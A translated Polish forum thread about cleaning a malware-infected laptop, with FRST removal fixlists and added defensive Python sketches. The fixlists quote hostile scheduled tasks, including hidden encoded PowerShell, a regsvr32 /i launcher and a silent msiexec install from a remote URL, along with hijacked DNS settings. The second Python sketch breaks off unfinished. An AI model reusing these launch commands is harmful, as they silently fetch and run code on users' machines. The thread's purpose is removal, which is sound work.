Elektroda.pl

Infected browsers on a laptop

amigo10 19 Apr 2017 18:41 822 6
  • #1 19 Apr 2017 18:41
    amigo10
    Level 11  

    While I was saving a new version of Kodi, a virus got in that redirects pages and additionally installs Firefox and Chrome. I only have the system browsers Edge and IE, and I managed to remove the "foreign" ones manually. Avast and Malware Hunter found something and removed it or moved it to quarantine, but with so many pop-up pages to block it is impossible to work. I am sending a zip with the FRST log and asking for help.

    0 6
  • #2 19 Apr 2017 18:54
    Kolobos
    Computer specialist

    Remove what AdwCleaner detected.

    Back up your bookmarks from Firefox.

    Uninstall Malware Hunter 1.25.0.42

    Run this Fixlist.txt for FRST:
    CloseProcesses:
    CreateRestorePoint:
    HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\ChromeHTML: -> "C:\Program Files (x86)\Dohat\Application\chrome.exe" "%1" <==== UWAGA
    Task: {03C8F1E2-C0DC-4A3D-893F-0AF453489DCF} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
    Task: {05906474-BF48-4602-A6FE-8CC8DC95EA67} - System32\Tasks\Windows-PG => powershell.exe C:\windows\Update\psgo\psgo.ps1
    Task: {06F3DC38-8C12-465B-8C24-5CC09B9882F6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {11BA9E26-3015-4F71-82C3-0929AE8E2E1B} - System32\Tasks\{341F42A9-9431-E96E-C831-A69D5F4FD834} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e321e2b2\d58749b9.dll" <==== UWAGA
    Task: {3176C29E-F6D7-4822-BB20-16A7DD37D1A0} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku <==== UWAGA
    Task: {3A71BAA3-BC8B-48BA-8853-BDA5E71ECA7D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Task: {46B6C82D-47E4-4C72-84A6-A125DB71E961} - System32\Tasks\{3DAB05FE-F952-465F-B539-A7646CFA5565} => pcalua.exe -a C:\Users\Professional\Desktop\Patience.exe -d C:\Users\Professional\Desktop
    Task: {5422586F-A72E-4120-80C9-1EA1514CF88B} - System32\Tasks\Stgatainnnick => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/oc...A362_090214FC3D00NJG4MNLDX&d=20170406 /q
    Task: {547F6479-3C1C-44E5-A1D2-50AE2993B4BD} - \{4A419993-7D82-4DEC-AC7E-861BBE859671} -> Brak pliku <==== UWAGA
    Task: {56EC1955-845A-4F19-88D3-2A5E3403D404} - System32\Tasks\{9A7DB107-2DD6-06AC-D63B-6A9E0FB569EF} => C:\ProgramData\{BCBF05C7-0B14-B26C-7598-ADF1941B1CA3}\BCD8CAE3-0B73-7D48-99D0-10699E37914E.exe <==== UWAGA
    Task: {583DFC87-3394-495A-8230-F0BF4A8CACC8} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {58C87F11-F104-4CFC-800A-DD142F844C92} - System32\Tasks\Metuswotosy Module => C:\Program Files (x86)\Dapasy\xbigiy.exe [2017-04-06] (Glarysoft Ltd)
    Task: {733E5F57-15CF-4E47-AB52-3670A0E092E9} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {84567708-D01F-4289-9550-9ECD1D48B140} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
    Task: {84E120F2-14B7-4A1E-A822-E1D0A4F66E54} - System32\Tasks\RunAtStartup => C:\Users\Professional\AppData\Roaming\Event Monitor\em.exe <==== UWAGA
    Task: {867BDE66-0338-4FF2-B004-103A2D5A75E5} - System32\Tasks\Celerch Controls => C:\Program Files (x86)\Lwuward\xfiloy.exe




    Task: {921D2E45-E97E-4E87-BEC1-B084EEA58FE3} - System32\Tasks\{0D080F47-087A-7D0E-0511-05080F0D1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgACAAOwA7ACAAOwAgACAAOwAgADsAOwAgACAAOwA7ACAAOwAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEA (dane wartości zawierają 9608 znaków więcej). <==== UWAGA
    Task: {9415D668-648F-4367-88AA-9ECACFD1BEBB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {968216E1-E9E5-4EA2-9D5E-B11D91F6BF64} - System32\Tasks\Qahesy Host => C:\Program Files (x86)\Dapasy\xgogoly.exe
    Task: {9959E33E-9126-4EA6-AAAF-9B73386054C0} - System32\Tasks\{061C6AC7-AFB1-C85D-601B-0DD8755DF154} => C:\Users\PROFES~1\AppData\Roaming\PRICEF~1\SYNHEL~1 <==== UWAGA
    Task: {9D795267-50F0-4799-88D9-1A56FE687984} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
    Task: {C1E44BCD-A8C7-4B61-B8BF-0B1A754B25B5} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] ()
    Task: {DAA18B2B-B64E-4053-AD22-C72FD9029D5F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA
    Task: {E037C663-F65C-4E91-B000-80A628AC056F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {EF4619D1-D7B4-4FD9-969D-D8F3805A8F97} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
    Task: {F8B83AA5-74C8-467C-8466-EE0E42A0C211} - System32\Tasks\InternetAF => ""
    Task: {FBF1B6E2-4D52-494D-9521-3AF5F583C44D} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
    Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\WINDOWS\Tasks\{061C6AC7-AFB1-C85D-601B-0DD8755DF154}.job => C:\Users\PROFES~1\AppData\Roaming\PRICEF~1\SYNHEL~1 /Check Professional-PC\Professional  0 ß’
    Ö  <   <==== UWAGA
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...HitachiXHTS723225L9A362_090214FC3D00NJG4MNLDX
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> url,FileProtocolHandler "hxxp://www.mail.ru/cnt/20775012?gp=811035"
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...HitachiXHTS723225L9A362_090214FC3D00NJG4MNLDX
    2017-04-06 18:41 - 2017-04-06 18:41 - 00307200 _____ () C:\Program Files (x86)\Celerch Controls\local64spl.dll
    Hosts:
    HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\Professional\AppData\Local\Temp\DeleteOnReboot.bat [80 2017-04-19] () <===== UWAGA
    HKLM\...\Providers\s9gqtjyv: C:\Program Files (x86)\Celerch Controls\local64spl.dll [307200 2017-04-06] ()
    ShellExecuteHooks: Brak nazwy - {7AD1C0F5-07A2-40E5-8608-C6EAA0FF362F} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {AD05C15E-1A7B-11E7-9314-64006A5CFC23} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {FC4AC378-147C-11E7-9B36-64006A5CFC23} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {8480E188-147D-11E7-A41F-64006A5CFC23} - -> Brak pliku
    GroupPolicy: Ograniczenia - Windows Defender <======= UWAGA
    GroupPolicy\User: Ograniczenia <======= UWAGA
    Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{7819ca67-557b-4e48-a326-5c308a9e2d64}: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{7819ca67-557b-4e48-a326-5c308a9e2d64}: [DhcpNameServer] 82.163.143.157
    Tcpip\..\Interfaces\{851937ed-3e2b-443d-9e90-892f02f770e1}: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{851937ed-3e2b-443d-9e90-892f02f770e1}: [DhcpNameServer] 82.163.143.157
    Tcpip\..\Interfaces\{bf29e9aa-06fa-4f43-852b-2659e9b0727a}: [NameServer] 82.163.143.157 82.163.142.159
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
    SearchScopes: HKU\S-1-5-21-1342425534-1270870966-1533166586-1000 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://search.yac.mx/web/?q={searchTerms}&type=ds&from=yac&uid=hitachixhts723225l9a362_090214fc3d00njg4mnldx&ts=1470499479
    SearchScopes: HKU\S-1-5-21-1342425534-1270870966-1533166586-1000 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://search.yac.mx/web/?q={searchTerms}&type=ds&from=yac&uid=hitachixhts723225l9a362_090214fc3d00njg4mnldx&ts=1470499479
    BHO: Owisebeukpor -> {DD817D7D-657A-4B43-b4B3-F3B9515771A9} -> Brak pliku
    BHO-x32: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Professional\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll [2016-11-28] (Mail.Ru)
    FF ProfilePath: C:\Users\Professional\AppData\Roaming\Mozilla\Profiles\jmqjc1zy.default\Profiles\4z123uim.default [nie znaleziono]
    FF DefaultSearchEngine: Mozilla\Profiles\jmqjc1zy.default -> Поиск@Mail.Ru
    FF DefaultSearchEngine.US: Mozilla\Profiles\jmqjc1zy.default -> data:text/plain,browser.search.defaultenginename.US=cloudfront
    FF SelectedSearchEngine: Mozilla\Profiles\jmqjc1zy.default -> Поиск@Mail.Ru
    FF Homepage: Mozilla\Profiles\jmqjc1zy.default -> hxxp://mail.ru/cnt/10445?gp=818411
    FF Keyword.URL: Mozilla\Profiles\jmqjc1zy.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B4F...-685C-462C-9B4C-589045E1C08A%7D&gp=811041
    FF Extension: (sidebar) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\Extensions\sidebarff@gmail.com [2015-11-07] [Brak podpisu cyfrowego]
    FF Extension: (Brak nazwy) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\artur.dubovoy@gmail.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\content_blocker@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\virtual_keyboard@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\anti_banner@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\online_banking@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\arthurj8283@gmail.com [nie znaleziono]
    FF NewTab: Profiles\jmqjc1zy.default -> hxxp://www.initialpage123.com/?z=19d8f4c8a035...23225L9A362_090214FC3D00NJG4MNLDX&type=hp
    FF DefaultSearchEngine.US: Profiles\jmqjc1zy.default -> data:text/plain,browser.search.defaultenginename.US=cloudfront
    FF SelectedSearchEngine: Profiles\jmqjc1zy.default -> initialpage123
    FF Keyword.URL: Profiles\jmqjc1zy.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B4F...-685C-462C-9B4C-589045E1C08A%7D&gp=811041
    FF Extension: (FF Adr) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-10] [Brak podpisu cyfrowego]
    FF Extension: (Домашняя страница Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\homepage@mail.ru [2016-11-28]
    FF Extension: (Поиск@Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\search@mail.ru [2016-11-28]
    FF Extension: (Визуальные закладки @Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7} [2016-11-28]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\11fseov0.xml [2017-04-06]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\mailru.xml [2016-11-28]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\paycreiz.xml [2016-05-31]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\qm7ojdc0.xml [2017-04-06]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\s9gqtjyv.xml [2017-04-10]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\startsearch.xml [2017-04-19]
    FF Extension: (sidebar) - C:\Users\Professional\AppData\Roaming\Firefox\Firefox\Profiles\4z123uim.default\Extensions\sidebarff@gmail.com [2015-11-07] [Brak podpisu cyfrowego]
    FF HKLM-x32\...\Firefox\Extensions: [sidebarff@gmail.com] - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\sidebarff@gmail.com
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\extensions\arthurj8283@gmail.com
    FF HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Professional\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => nie znaleziono
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-1342425534-1270870966-1533166586-1000: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Professional\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-02-13]
    CHR HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe <==== UWAGA
    C:\Program Files (x86)\Dohat\
    R2 3DM; C:\Users\Professional\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] (kitty.exe) [Brak podpisu cyfrowego]
    S2 AppleAzureSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [105472 2017-04-14] () [Brak podpisu cyfrowego]
    S2 Kitty; C:\Users\Professional\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]
    S2 Recover; C:\Program Files\AVAST Software\ZXYSVI\çQLNCHiTQG.exe [121344 2017-04-17] () [Brak podpisu cyfrowego]
    R2 SNARE; C:\Users\Professional\AppData\Local\SNARE\Snarer.dll [793600 2017-04-17] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    2017-04-19 11:05 - 2017-04-19 11:05 - 00000000 ____D C:\Users\Professional\AppData\Local\Dohat
    2017-04-19 11:04 - 2017-04-19 11:04 - 00000000 ____D C:\Users\Professional\AppData\Local\3DM
    2017-04-19 09:49 - 2017-04-19 09:49 - 01186999 _____ ( ) C:\Users\Professional\Downloads\JavaSetup_3143535439.exe
    2017-04-18 10:48 - 2017-04-18 10:48 - 00000000 ____D C:\ProgramData\SWCUTemp
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\WINDOWS\Update
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Local\Kitty
    2017-04-16 20:53 - 2017-04-16 20:53 - 00000000 ____D C:\Users\Professional\AppData\Local\Alltie
    2017-04-14 11:06 - 2017-04-14 11:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-14 10:58 - 2017-04-19 11:05 - 00002208 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-04-14 10:58 - 2017-04-19 11:05 - 00002079 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-04-14 10:58 - 2017-04-14 10:58 - 00000000 ____D C:\ProgramData\Software
    2017-04-14 10:16 - 2017-04-14 10:16 - 00023704 _____ C:\WINDOWS\System32\Tasks\{0D080F47-087A-7D0E-0511-05080F0D1179}
    2017-04-14 10:16 - 2017-04-14 10:16 - 00003986 _____ C:\WINDOWS\System32\Tasks\{9A7DB107-2DD6-06AC-D63B-6A9E0FB569EF}
    2017-04-14 10:16 - 2017-04-14 10:16 - 00003896 _____ C:\WINDOWS\System32\Tasks\{341F42A9-9431-E96E-C831-A69D5F4FD834}
    2017-04-13 13:11 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Local\SNARE
    2017-04-13 13:11 - 2017-04-13 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-10 13:26 - 2017-04-19 11:05 - 00000000 ____D C:\Users\Professional\AppData\LocalLow\Mozilla
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Firefox
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Local\Firefox
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Local\Antanna
    2017-04-10 13:24 - 2017-04-19 17:23 - 00000046 _____ C:\Users\Public\Documents\temp.dat
    2017-04-10 13:24 - 2017-04-19 11:15 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-10 13:24 - 2017-04-10 13:24 - 00000000 ____D C:\ProgramData\common
    2017-04-10 13:24 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-10 13:24 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-10 10:11 - 2017-04-17 17:10 - 00000000 ____D C:\Users\Professional\AppData\Local\SNARER
    2017-04-07 13:55 - 2017-04-07 13:55 - 00122880 _____ () C:\Theobald.dll
    2017-04-07 08:57 - 2017-04-19 11:04 - 00003702 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-07 08:57 - 2017-04-17 16:10 - 00003620 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-07 08:57 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Roaming\WinSAPSvc
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Users\Professional\AppData\Roaming\SNARER
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Users\Professional\AppData\Local\AMD
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Update
    2017-04-07 08:53 - 2017-04-19 11:04 - 00000000 ____D C:\Program Files\MK
    2017-04-06 21:00 - 2017-04-06 21:00 - 00000000 ____D C:\ProgramData\ByteFence
    2017-04-06 20:30 - 2017-04-07 08:57 - 00000000 ____D C:\Program Files\ByteFence
    2017-04-06 19:37 - 2017-04-06 19:37 - 00000000 ___HD C:\$AV_ASW
    2017-04-06 19:27 - 2017-04-10 13:58 - 00000000 ____D C:\Users\Professional\AppData\Local\Predck
    2017-04-06 19:05 - 2017-04-06 19:47 - 00000000 ____D C:\Users\Professional\AppData\Roaming\24341904
    2017-04-06 19:05 - 2017-04-06 19:05 - 00000000 ____D C:\Program Files (x86)\Dapasy
    2017-04-06 18:57 - 2017-04-07 08:48 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Ghivaent
    2017-04-06 18:57 - 2017-04-06 18:57 - 00006084 _____ C:\WINDOWS\System32\Tasks\Metuswotosy Module
    2017-04-06 18:57 - 2017-04-06 18:57 - 00000000 ____D C:\Program Files (x86)\Metuswotosy Module
    2017-04-06 18:43 - 2017-04-06 19:47 - 00000000 ____D C:\Users\Professional\AppData\Roaming\44741880
    2017-04-06 18:43 - 2017-04-06 19:32 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Rasers
    2017-04-06 18:43 - 2017-04-06 19:27 - 00140288 _____ C:\Users\Professional\AppData\Roaming\Installer.dat
    2017-04-06 18:43 - 2017-04-06 19:27 - 00011568 _____ C:\Users\Professional\AppData\Roaming\InstallationConfiguration.xml
    2017-04-06 18:43 - 2017-04-06 18:43 - 00006032 _____ C:\WINDOWS\System32\Tasks\Qahesy Host
    2017-04-06 18:43 - 2017-04-06 18:43 - 00000000 ____D C:\Users\Professional\AppData\Local\Neduge
    2017-04-06 18:43 - 2017-04-06 18:43 - 00000000 ____D C:\Program Files (x86)\Qahesy Host
    2017-04-06 18:41 - 2017-04-06 19:32 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Praepyplontion
    2017-04-06 18:41 - 2017-04-06 18:41 - 00006104 _____ C:\WINDOWS\System32\Tasks\Celerch Controls
    2017-04-06 18:41 - 2017-04-06 18:41 - 00005160 _____ C:\WINDOWS\System32\Tasks\Stgatainnnick
    2017-04-06 18:41 - 2017-04-06 18:41 - 00000000 ____D C:\Users\Professional\AppData\Local\Biwspcajet
    2017-04-06 18:41 - 2017-04-06 18:41 - 00000000 ____D C:\Program Files (x86)\Celerch Controls
    2017-04-06 18:40 - 2017-04-06 19:37 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Event Monitor
    2017-04-06 18:40 - 2017-04-06 19:32 - 00000000 ____D C:\Program Files (x86)\pccleanplus
    2017-04-06 18:40 - 2017-04-06 19:01 - 00003120 _____ C:\WINDOWS\System32\Tasks\RunAtStartup
    2017-04-19 18:04 - 2015-02-03 18:41 - 00000000 ____D C:\AdwCleaner
    2017-04-06 18:43 - 2017-04-06 19:27 - 0011568 _____ () C:\Users\Professional\AppData\Roaming\InstallationConfiguration.xml
    2017-04-06 18:43 - 2017-04-06 19:27 - 0140288 _____ () C:\Users\Professional\AppData\Roaming\Installer.dat
    Pliki do przeniesienia lub usunięcia:
    EmptyTemp:


    Run a full scan with MBAM and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    When everything is done, post new FRST logs from a scan.

    0
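An added example, not part of the thread and not FRST's own code: a Python sketch that triages `Task:` lines of the kind listed in the Fixlist above, tagging the launcher patterns that appear there (encoded PowerShell, `regsvr32 /i:`, `msiexec /i` with a URL, targets in user-writable folders, tasks whose file is missing) and decoding `-EncodedCommand` values even when FRST has truncated them. The sample lines, GUIDs, paths and tag names are constructed for illustration.

```python
import base64
import re

MARKER = re.compile(r"\s*<=+\s*UWAGA\s*$")  # FRST attention marker (Polish build)
ARROW = re.compile(r"\s(=>|->)\s")          # separates the task from its command
# -EncodedCommand and its accepted abbreviations, followed by a base64 run
ENC_ARG = re.compile(r"-(?:e|ec|en(?:c[a-z]*)?)\s+([A-Za-z0-9+/=]{16,})", re.I)
RULES = [  # tag names are this example's own, not FRST terminology
    ("regsvr32-dllinstall", re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:", re.I)),
    ("msiexec-remote-package", re.compile(r"\bmsiexec\b.*/i\s+h(tt|xx)ps?://", re.I)),
    ("user-writable-path", re.compile(r"\\(AppData|ProgramData|Users\\Public)\\", re.I)),
]

def parse_task(line):
    """Split one FRST 'Task:' line into (task, command); None for other lines."""
    line = line.strip()
    if not line.startswith("Task:"):
        return None
    body = MARKER.sub("", line[5:].strip())
    m = ARROW.search(body)
    if not m:
        return None
    return body[:m.start()].strip(), body[m.end():].strip()

def decode_encoded_command(command):
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE text)."""
    m = ENC_ARG.search(command)
    if not m:
        return None
    blob = m.group(1)
    blob = blob[: len(blob) // 4 * 4]  # FRST cuts long values: keep whole base64 groups
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")

def triage(lines):
    """Return one finding per task line that matches at least one rule."""
    findings = []
    for line in lines:
        parsed = parse_task(line)
        if parsed is None:
            continue
        task, command = parsed
        tags = [name for name, rx in RULES if rx.search(command)]
        decoded = None
        if command.startswith("Brak pliku"):  # "no file": the task's target is gone
            tags.append("orphaned-task")
        if "powershell" in command.lower():
            decoded = decode_encoded_command(command)
            if decoded is not None:
                tags.append("encoded-powershell")
        if tags:
            findings.append({"task": task, "tags": tags, "decoded": decoded})
    return findings

# Constructed sample input (placeholder GUIDs, names and paths).
ENC = base64.b64encode('Write-Output "constructed sample"'.encode("utf-16-le")).decode()
SAMPLE = [
    r"Task: {11111111-1111-1111-1111-111111111111} - System32\Tasks\ExampleA => powershell.exe -nologo -executionpolicy bypass -windowstyle hidden -EncodedCommand " + ENC,
    r'Task: {22222222-2222-2222-2222-222222222222} - System32\Tasks\ExampleB => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\example\example.dll" <==== UWAGA',
    r'Task: {33333333-3333-3333-3333-333333333333} - System32\Tasks\ExampleC => "msiexec" /i hxxp://example.invalid/pkg.msi /q',
    r"Task: {44444444-4444-4444-4444-444444444444} - \Microsoft\Windows\Setup\gwx\example -> Brak pliku <==== UWAGA",
    r"Task: {55555555-5555-5555-5555-555555555555} - System32\Tasks\ExampleE => C:\Program Files\Vendor\updater.exe",
    r"Task: {66666666-6666-6666-6666-666666666666} - System32\Tasks\ExampleF => C:\Users\User\AppData\Roaming\Example\example.exe",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding["tags"], finding["task"], finding["decoded"] or "")
```

A truncated `-EncodedCommand` value still yields the readable start of the script, which is usually enough to decide whether the task belongs in the fixlist.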
  • #4 19 Apr 2017 20:55
    Kolobos
    Computer specialist

    You did not do this:
    > When everything is done, post new FRST logs from a scan.

    0
  • #6 20 Apr 2017 08:44
    Kolobos
    Computer specialist

    Manually delete the shortcut with Cyrillic characters in its name:
    C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk
    and create a new, correct one if you need it.

    New Fixlist.txt for FRST:
    2017-04-19 22:45 - 2017-04-19 22:45 - 00000000 ____D C:\Users\Professional\Downloads\FRST-OlderVersion
    2017-04-19 20:04 - 2017-04-19 20:04 - 00000000 ____D C:\AdwCleaner
    2017-04-19 20:01 - 2017-04-19 20:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-19 19:59 - 2017-04-19 19:59 - 00000000 ____D C:\ProgramData\SWCUTemp
    C:\Users\Professional\IP_Log_Data.js
    C:\Users\Professional\Network_Meter_Data.js

    After it has run, delete the C:\FRST directory, and that is all.

    0
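An added example, not part of the thread: a Python sketch that finds shortcut names like the one in the post above, where Cyrillic letters are mixed into an otherwise Latin word so the file looks like a legitimate "Internet Explorer" shortcut. The sample name is constructed with explicit code points, and the function names and the per-word heuristic are this example's own assumptions.

```python
import os
import re
import unicodedata

WORD = re.compile(r"[^\W\d_]+")  # runs of letters in any script

def script_of(ch):
    """Coarse script label taken from the Unicode character name."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK"):
        if name.startswith(script):
            return script
    return "OTHER"

def mixed_script_words(filename):
    """Return the words in a file name that mix scripts inside one word.

    Checking per word keeps names such as 'Поиск@Mail.Ru' (each word in a
    single script) from being flagged; a word spelled entirely in look-alike
    Cyrillic letters is not caught by this heuristic.
    """
    stem = os.path.splitext(filename)[0]
    hits = []
    for m in WORD.finditer(stem):
        word = m.group()
        scripts = {s for s in map(script_of, word) if s}
        if len(scripts) > 1:
            non_latin = [(m.start() + i, f"U+{ord(c):04X}", unicodedata.name(c, "?"))
                         for i, c in enumerate(word) if script_of(c) != "LATIN"]
            hits.append({"word": word, "scripts": sorted(scripts), "non_latin": non_latin})
    return hits

def scan_tree(root, suffix=".lnk"):
    """Walk a folder (for example a pinned-taskbar directory) and report such shortcuts."""
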